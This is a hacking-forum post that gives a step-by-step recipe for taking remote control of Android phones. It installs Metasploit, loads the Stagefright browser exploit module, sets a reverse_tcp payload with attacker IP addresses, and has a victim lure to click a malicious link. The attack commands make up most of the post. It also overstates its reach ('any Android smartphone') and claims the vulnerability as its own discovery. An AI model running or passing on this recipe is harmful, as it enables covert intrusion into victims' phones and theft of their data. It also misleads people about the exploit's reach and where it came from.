How to hack Android with a link? Yes, it's easy!

Jollier

Professional
Messages
1,127
Reputation
6
Reaction score
1,105
Points
113
Hacking Android with a link

We will tell you how to hack any Android smartphone with a regular link! We'll get remote access.

Greetings to all, dear friends!

We discovered a number of serious vulnerabilities in one of the components of the Android mobile OS kernel called Stagefright.

To implement the attack, we will only need to force the victim to click on a malicious link in order to gain remote access to Android.

Installing The Metasploit Framework

ea0a6b49-107b-4fdb-b88e-ad9d2816fe0c.png


Update packages using the command:

Code:
pkg update && pkg upgrade

Next, install all the necessary libraries:

Code:
pkg install unstable-repo

pkg install x11-repo

And install Metasploit:

pkg install metasploit

We are waiting for the end of the installation process.

Using Stagefright

4af73036-2b3a-40fc-b9ca-6fa82614c64a.png


Open Metasploit with the command:

Code:
msfconsole

Next, we will use the exploit to exploit the vulnerability:

Code:
exploit/android/browser/stagefright_mp4_tx3g_64bit

Setting the value of our IP address:

Code:
set SRVHOST <ip address>

set LHOST <ip address>

Now we set the following parameters:

Code:
set URIPATH /

set PAYLOAD linux/armle/mettle/reverse_tcp

set VERBOSE true

Launching the exploit:

Code:
exploit -j

A malicious link will appear in the window that opens, and our victim should follow it. If the victim clicks on it, a session for remote access will open in our terminal.
 
Top